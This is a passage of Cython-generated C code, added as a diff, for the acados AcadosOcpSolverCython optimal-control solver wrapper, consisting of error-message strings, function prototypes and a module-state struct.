__pyx_k_AcadosOcpSolverCython_print_stat[] = "AcadosOcpSolverCython.print_statistics"; +static const char __pyx_k_AcadosOcpSolverCython_set_is_not[] = "AcadosOcpSolverCython.set(): {} is not a valid argument. \nPossible values are {}. Exiting."; +static const char __pyx_k_AcadosOcpSolverCython_set_mismat[] = "AcadosOcpSolverCython.set(): mismatching dimension for field \"{}\" "; +static const char __pyx_k_AcadosOcpSolverCython_set_new_ti[] = "AcadosOcpSolverCython.set_new_time_steps"; +static const char __pyx_k_AcadosOcpSolverCython_solve_argu[] = "AcadosOcpSolverCython.solve(): argument 'rti_phase' can take only values 0, 1, 2 for SQP-RTI-type solvers"; +static const char __pyx_k_AcadosOcpSolverCython_store_iter[] = "AcadosOcpSolverCython.store_iterate"; +static const char __pyx_k_All_dimensions_preceding_dimensi[] = "All dimensions preceding dimension %d must be indexed and not sliced"; +static const char __pyx_k_Buffer_view_does_not_expose_stri[] = "Buffer view does not expose strides"; +static const char __pyx_k_Can_only_create_a_buffer_that_is[] = "Can only create a buffer that is contiguous in memory."; +static const char __pyx_k_Cannot_assign_to_read_only_memor[] = "Cannot assign to read-only memoryview"; +static const char __pyx_k_Cannot_create_writable_memory_vi[] = "Cannot create writable memory view from read-only memoryview"; +static const char __pyx_k_Cannot_transpose_memoryview_with[] = "Cannot transpose memoryview with indirect dimensions"; +static const char __pyx_k_Empty_shape_tuple_for_cython_arr[] = "Empty shape tuple for cython.array"; +static const char __pyx_k_Incompatible_checksums_0x_x_vs_0[] = "Incompatible checksums (0x%x vs (0x82a3537, 0x6ae9995, 0xb068931) = (name))"; +static const char __pyx_k_Indirect_dimensions_not_supporte[] = "Indirect dimensions not supported"; +static const char __pyx_k_Invalid_mode_expected_c_or_fortr[] = "Invalid mode, expected 'c' or 'fortran', got "; +static const char __pyx_k_Out_of_bounds_on_buffer_access_a[] = "Out of bounds on buffer access (axis "; +static const char __pyx_k_Unable_to_convert_item_to_object[] = "Unable to convert item to object"; +static const char __pyx_k_acados_template_acados_ocp_solve[] = "acados_template.acados_ocp_solver_pyx"; +static const char __pyx_k_alpha_values_are_not_available_f[] = "alpha values are not available for SQP_RTI"; +static const char __pyx_k_got_differing_extents_in_dimensi[] = "got differing extents in dimension "; +static const char __pyx_k_line_search_use_sufficient_desce[] = "line_search_use_sufficient_descent"; +static const char __pyx_k_load_iterate_failed_file_does_no[] = "load_iterate: failed, file does not exist: "; +static const char __pyx_k_no_default___reduce___due_to_non[] = "no default __reduce__ due to non-trivial __cinit__"; +static const char __pyx_k_numpy_core_umath_failed_to_impor[] = "numpy.core.umath failed to import"; +static const char __pyx_k_solver_option_must_be_of_type_fl[] = "solver option {} must be of type float. You have {}."; +static const char __pyx_k_solver_option_must_be_of_type_in[] = "solver option {} must be of type int. You have {}."; +static const char __pyx_k_solver_option_must_be_of_type_st[] = "solver option {} must be of type str. You have {}."; +static const char __pyx_k_third_party_acados_acados_templa[] = "third_party/acados/acados_template/acados_ocp_solver_pyx.pyx"; +static const char __pyx_k_unable_to_allocate_shape_and_str[] = "unable to allocate shape and strides."; +static const char __pyx_k_AcadosOcpSolverCython__get_stat_2[] = "_AcadosOcpSolverCython__get_stat_double"; +static const char __pyx_k_AcadosOcpSolverCython__get_stat_3[] = "_AcadosOcpSolverCython__get_stat_matrix"; +static const char __pyx_k_AcadosOcpSolverCython___get_stat_2[] = "AcadosOcpSolverCython.__get_stat_double"; +static const char __pyx_k_AcadosOcpSolverCython___get_stat_3[] = "AcadosOcpSolverCython.__get_stat_matrix"; +static const char __pyx_k_AcadosOcpSolverCython_constraint_2[] = "AcadosOcpSolverCython.constraints_set"; +static const char __pyx_k_AcadosOcpSolverCython_does_not_s_2[] = "AcadosOcpSolverCython: does not support update_qp_solver_cond_N() since it is only a prototyping feature"; +static const char __pyx_k_AcadosOcpSolverCython_eval_param_2[] = "AcadosOcpSolverCython.eval_param_sens(): index must be in [0, nx-1], got: "; +static const char __pyx_k_AcadosOcpSolverCython_eval_param_3[] = "AcadosOcpSolverCython.eval_param_sens"; +static const char __pyx_k_AcadosOcpSolverCython_options_se_2[] = "AcadosOcpSolverCython.options_set"; +static const char __pyx_k_AcadosOcpSolverCython_solve_argu_2[] = "AcadosOcpSolverCython.solve(): argument 'rti_phase' can take only value 0 for SQP-type solvers"; +/* #### Code section: decls ### */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array___cinit__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_shape, Py_ssize_t __pyx_v_itemsize, PyObject *__pyx_v_format, PyObject *__pyx_v_mode, int __pyx_v_allocate_buffer); /* proto */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_2__getbuffer__(struct __pyx_array_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /* proto */ +static void __pyx_array___pyx_pf_15View_dot_MemoryView_5array_4__dealloc__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_5array_7memview___get__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static Py_ssize_t __pyx_array___pyx_pf_15View_dot_MemoryView_5array_6__len__(struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_8__getattr__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_attr); /* proto */ +static PyObject *__pyx_array___pyx_pf_15View_dot_MemoryView_5array_10__getitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item); /* proto */ +static int __pyx_array___pyx_pf_15View_dot_MemoryView_5array_12__setitem__(struct __pyx_array_obj *__pyx_v_self, PyObject *__pyx_v_item, PyObject *__pyx_v_value); /* proto */ +static PyObject *__pyx_pf___pyx_array___reduce_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_array_2__setstate_cython__(CYTHON_UNUSED struct __pyx_array_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum___init__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v_name); /* proto */ +static PyObject *__pyx_MemviewEnum___pyx_pf_15View_dot_MemoryView_4Enum_2__repr__(struct __pyx_MemviewEnum_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_MemviewEnum___reduce_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_MemviewEnum_2__setstate_cython__(struct __pyx_MemviewEnum_obj *__pyx_v_self, PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview___cinit__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_obj, int __pyx_v_flags, int __pyx_v_dtype_is_object); /* proto */ +static void __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_2__dealloc__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_4__getitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_6__setitem__(struct __pyx_memoryview_obj *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_value); /* proto */ +static int __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_8__getbuffer__(struct __pyx_memoryview_obj *__pyx_v_self, Py_buffer *__pyx_v_info, int __pyx_v_flags); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_1T___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4base___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_5shape___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_7strides___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_10suboffsets___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4ndim___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_8itemsize___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_6nbytes___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView_10memoryview_4size___get__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static Py_ssize_t __pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_10__len__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_12__repr__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_14__str__(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_16is_c_contig(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_18is_f_contig(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_20copy(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_memoryview___pyx_pf_15View_dot_MemoryView_10memoryview_22copy_fortran(struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryview___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryview_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryview_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static void __pyx_memoryviewslice___pyx_pf_15View_dot_MemoryView_16_memoryviewslice___dealloc__(struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryviewslice___reduce_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf___pyx_memoryviewslice_2__setstate_cython__(CYTHON_UNUSED struct __pyx_memoryviewslice_obj *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_pf_15View_dot_MemoryView___pyx_unpickle_Enum(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v___pyx_type, long __pyx_v___pyx_checksum, PyObject *__pyx_v___pyx_state); /* proto */ +static int __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython___cinit__(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_model_name, PyObject *__pyx_v_nlp_solver_type, PyObject *__pyx_v_N); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_2__get_pointers_solver(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_4solve(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_6reset(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_8set_new_time_steps(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_new_time_steps); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_10update_qp_solver_cond_N(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v_qp_solver_cond_N); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_12eval_param_sens(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_index, PyObject *__pyx_v_stage, PyObject *__pyx_v_field); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_14get(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_16print_statistics(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_lambda_funcdef_lambda(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_x); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_18store_iterate(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_filename, PyObject *__pyx_v_overwrite); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_20load_iterate(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_filename); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_22get_stats(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_24__get_stat_int(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_26__get_stat_double(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_28__get_stat_matrix(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field, PyObject *__pyx_v_n, PyObject *__pyx_v_m); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_recompute); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_34set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_36cost_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_38constraints_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_40dynamics_get(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, int __pyx_v_stage, PyObject *__pyx_v_field_); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_42options_set(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field_, PyObject *__pyx_v_value_); /* proto */ +static void __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_44__del__(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_46__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self); /* proto */ +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_48__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state); /* proto */ +static PyObject *__pyx_tp_new_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_array(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_Enum(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new_memoryview(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +static PyObject *__pyx_tp_new__memoryviewslice(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ +/* #### Code section: late_includes ### */ +/* #### Code section: module_state ### */ +typedef struct { + PyObject *__pyx_d; + PyObject *__pyx_b; + PyObject *__pyx_cython_runtime; + PyObject *__pyx_empty_tuple; + PyObject *__pyx_empty_bytes; + PyObject *__pyx_empty_unicode; + #ifdef __Pyx_CyFunction_USED + PyTypeObject *__pyx_CyFunctionType; + #endif + #ifdef __Pyx_FusedFunction_USED + PyTypeObject *__pyx_FusedFunctionType; + #endif + #ifdef __Pyx_Generator_USED + PyTypeObject *__pyx_GeneratorType; + #endif + #ifdef __Pyx_IterableCoroutine_USED + PyTypeObject *__pyx_IterableCoroutineType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineAwaitType; + #endif + #ifdef __Pyx_Coroutine_USED + PyTypeObject *__pyx_CoroutineType; + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyTypeObject *__pyx_ptype_7cpython_4type_type; + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + #if CYTHON_USE_MODULE_STATE + #endif + PyTypeObject *__pyx_ptype_5numpy_dtype; + PyTypeObject *__pyx_ptype_5numpy_flatiter; + PyTypeObject *__pyx_ptype_5numpy_broadcast; + PyTypeObject *__pyx_ptype_5numpy_ndarray; + PyTypeObject *__pyx_ptype_5numpy_generic; + PyTypeObject *__pyx_ptype_5numpy_number; + PyTypeObject *__pyx_ptype_5numpy_integer; + PyTypeObject *__pyx_ptype_5numpy_signedinteger; + PyTypeObject *__pyx_ptype_5numpy_unsignedinteger; + PyTypeObject *__pyx_ptype_5numpy_inexact; + PyTypeObject *__pyx_ptype_5numpy_floating; + PyTypeObject *__pyx_ptype_5numpy_complexfloating; + PyTypeObject *__pyx_ptype_5numpy_flexible; + PyTypeObject *__pyx_ptype_5numpy_character; + PyTypeObject *__pyx_ptype_5numpy_ufunc; + #if CYTHON_USE_MODULE_STATE + PyObject *__pyx_type_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython; + PyObject *__pyx_type___pyx_array; + PyObject *__pyx_type___pyx_MemviewEnum; + PyObject *__pyx_type___pyx_memoryview; + PyObject *__pyx_type___pyx_memoryviewslice; + #endif + PyTypeObject *__pyx_ptype_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython; + PyTypeObject *__pyx_array_type; + PyTypeObject *__pyx_MemviewEnum_type; + PyTypeObject *__pyx_memoryview_type; + PyTypeObject *__pyx_memoryviewslice_type; + PyObject *__pyx_kp_u_; + PyObject *__pyx_n_s_ASCII; + PyObject *__pyx_n_s_AcadosOcpSolverCython; + PyObject *__pyx_n_s_AcadosOcpSolverCython___get_poin; + PyObject *__pyx_n_s_AcadosOcpSolverCython___get_stat; + PyObject *__pyx_n_s_AcadosOcpSolverCython___get_stat_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython___get_stat_3; + PyObject *__pyx_n_s_AcadosOcpSolverCython___reduce_c; + PyObject *__pyx_n_s_AcadosOcpSolverCython___setstate; + PyObject *__pyx_n_s_AcadosOcpSolverCython__get_poin; + PyObject *__pyx_n_s_AcadosOcpSolverCython__get_stat; + PyObject *__pyx_n_s_AcadosOcpSolverCython__get_stat_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython__get_stat_3; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_constraint; + PyObject *__pyx_n_s_AcadosOcpSolverCython_constraint_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython_cost_set; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_cost_set_m; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_does_not_s; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_does_not_s_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython_dynamics_g; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_eval_param; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_eval_param_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython_eval_param_3; + PyObject *__pyx_n_s_AcadosOcpSolverCython_get; + PyObject *__pyx_n_s_AcadosOcpSolverCython_get_cost; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_get_field; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_get_is_an; + PyObject *__pyx_n_s_AcadosOcpSolverCython_get_residu; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_get_stage; + PyObject *__pyx_n_s_AcadosOcpSolverCython_get_stats; + PyObject *__pyx_n_s_AcadosOcpSolverCython_load_itera; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_options_se; + PyObject *__pyx_n_s_AcadosOcpSolverCython_options_se_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython_print_stat; + PyObject *__pyx_n_s_AcadosOcpSolverCython_reset; + PyObject *__pyx_n_s_AcadosOcpSolverCython_set; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_set_is_not; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_set_mismat; + PyObject *__pyx_n_s_AcadosOcpSolverCython_set_new_ti; + PyObject *__pyx_n_s_AcadosOcpSolverCython_solve; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_solve_argu; + PyObject *__pyx_kp_u_AcadosOcpSolverCython_solve_argu_2; + PyObject *__pyx_n_s_AcadosOcpSolverCython_store_iter; + PyObject *__pyx_n_s_AcadosOcpSolverCython_update_qp; + PyObject *__pyx_kp_s_All_dimensions_preceding_dimensi; + PyObject *__pyx_n_s_AssertionError; + PyObject *__pyx_kp_s_Buffer_view_does_not_expose_stri; + PyObject *__pyx_kp_s_Can_only_create_a_buffer_that_is; + PyObject *__pyx_kp_s_Cannot_assign_to_read_only_memor; + PyObject *__pyx_kp_s_Cannot_create_writable_memory_vi; + PyObject *__pyx_kp_u_Cannot_index_with_type; + PyObject *__pyx_kp_s_Cannot_transpose_memoryview_with; + PyObject *__pyx_kp_s_Dimension_d_is_not_direct; + PyObject *__pyx_n_s_Ellipsis; + PyObject *__pyx_kp_s_Empty_shape_tuple_for_cython_arr; + PyObject *__pyx_n_u_F; + PyObject *__pyx_n_s_ImportError; + PyObject *__pyx_kp_s_Incompatible_checksums_0x_x_vs_0; + PyObject *__pyx_n_s_IndexError; + PyObject *__pyx_kp_s_Index_out_of_bounds_axis_d; + PyObject *__pyx_kp_s_Indirect_dimensions_not_supporte; + PyObject *__pyx_kp_u_Invalid_mode_expected_c_or_fortr; + PyObject *__pyx_kp_u_Invalid_shape_in_axis; + PyObject *__pyx_n_s_MemoryError; + PyObject *__pyx_kp_s_MemoryView_of_r_at_0x_x; + PyObject *__pyx_kp_s_MemoryView_of_r_object; + PyObject *__pyx_n_s_N; + PyObject *__pyx_kp_u_None; + PyObject *__pyx_n_s_NotImplementedError; + PyObject *__pyx_n_b_O; + PyObject *__pyx_kp_u_Out_of_bounds_on_buffer_access_a; + PyObject *__pyx_n_s_PickleError; + PyObject *__pyx_n_u_SQP; + PyObject *__pyx_n_u_SQP_RTI; + PyObject *__pyx_n_s_Sequence; + PyObject *__pyx_kp_s_Step_may_not_be_zero_axis_d; + PyObject *__pyx_kp_u_TODO; + PyObject *__pyx_n_s_TypeError; + PyObject *__pyx_kp_s_Unable_to_convert_item_to_object; + PyObject *__pyx_n_s_ValueError; + PyObject *__pyx_n_s_View_MemoryView; + PyObject *__pyx_kp_u_Y_m_d_H_M_S_f; + PyObject *__pyx_kp_u__14; + PyObject *__pyx_n_u__15; + PyObject *__pyx_kp_u__2; + PyObject *__pyx_kp_u__29; + PyObject *__pyx_n_s__3; + PyObject *__pyx_kp_u__6; + PyObject *__pyx_kp_u__7; + PyObject *__pyx_n_s__84; + PyObject *__pyx_n_s_abc; + PyObject *__pyx_n_s_acados_template_acados_ocp_solve; + PyObject *__pyx_n_s_allocate_buffer; + PyObject *__pyx_n_u_alpha; + PyObject *__pyx_n_u_alpha_min; + PyObject *__pyx_n_u_alpha_reduction; + PyObject *__pyx_kp_u_alpha_values_are_not_available_f; + PyObject *__pyx_kp_u_and; + PyObject *__pyx_n_s_array; + PyObject *__pyx_n_s_ascontiguousarray; + PyObject *__pyx_n_s_asfortranarray; + PyObject *__pyx_n_s_asyncio_coroutines; + PyObject *__pyx_kp_u_at_stage; + PyObject *__pyx_n_s_base; + PyObject *__pyx_n_s_c; + PyObject *__pyx_n_u_c; + PyObject *__pyx_n_s_class; + PyObject *__pyx_n_s_class_getitem; + PyObject *__pyx_n_s_cline_in_traceback; + PyObject *__pyx_n_s_collections; + PyObject *__pyx_kp_s_collections_abc; + PyObject *__pyx_n_s_constraints_fields; + PyObject *__pyx_n_s_constraints_set; + PyObject *__pyx_kp_s_contiguous_and_direct; + PyObject *__pyx_kp_s_contiguous_and_indirect; + PyObject *__pyx_n_s_cost_fields; + PyObject *__pyx_n_s_cost_set; + PyObject *__pyx_n_s_count; + PyObject *__pyx_n_s_datetime; + PyObject *__pyx_n_s_default; + PyObject *__pyx_n_s_dict; + PyObject *__pyx_n_s_dims; + PyObject *__pyx_kp_u_disable; + PyObject *__pyx_n_s_double_fields; + PyObject *__pyx_n_s_double_value; + PyObject *__pyx_n_s_dtype; + PyObject *__pyx_n_s_dtype_is_object; + PyObject *__pyx_n_s_dump; + PyObject *__pyx_n_s_dynamics_get; + PyObject *__pyx_kp_u_enable; + PyObject *__pyx_n_s_encode; + PyObject *__pyx_n_s_enter; + PyObject *__pyx_n_s_enumerate; + PyObject *__pyx_n_u_eps_sufficient_descent; + PyObject *__pyx_n_s_error; + PyObject *__pyx_n_s_eval_param_sens; + PyObject *__pyx_n_u_ex; + PyObject *__pyx_n_s_exit; + PyObject *__pyx_n_s_f; + PyObject *__pyx_n_s_field; + PyObject *__pyx_n_s_field_2; + PyObject *__pyx_n_s_fields; + PyObject *__pyx_n_s_filename; + PyObject *__pyx_n_s_flags; + PyObject *__pyx_n_s_float64; + PyObject *__pyx_kp_u_for_field; + PyObject *__pyx_n_s_format; + PyObject *__pyx_n_s_fortran; + PyObject *__pyx_n_u_fortran; + PyObject *__pyx_n_s_full_stats; + PyObject *__pyx_n_u_full_step_dual; + PyObject *__pyx_kp_u_gc; + PyObject *__pyx_n_s_get; + PyObject *__pyx_n_s_get_cost; + PyObject *__pyx_n_s_get_pointers_solver; + PyObject *__pyx_n_s_get_residuals; + PyObject *__pyx_n_s_get_stat_double; + PyObject *__pyx_n_s_get_stat_int; + PyObject *__pyx_n_s_get_stat_matrix; + PyObject 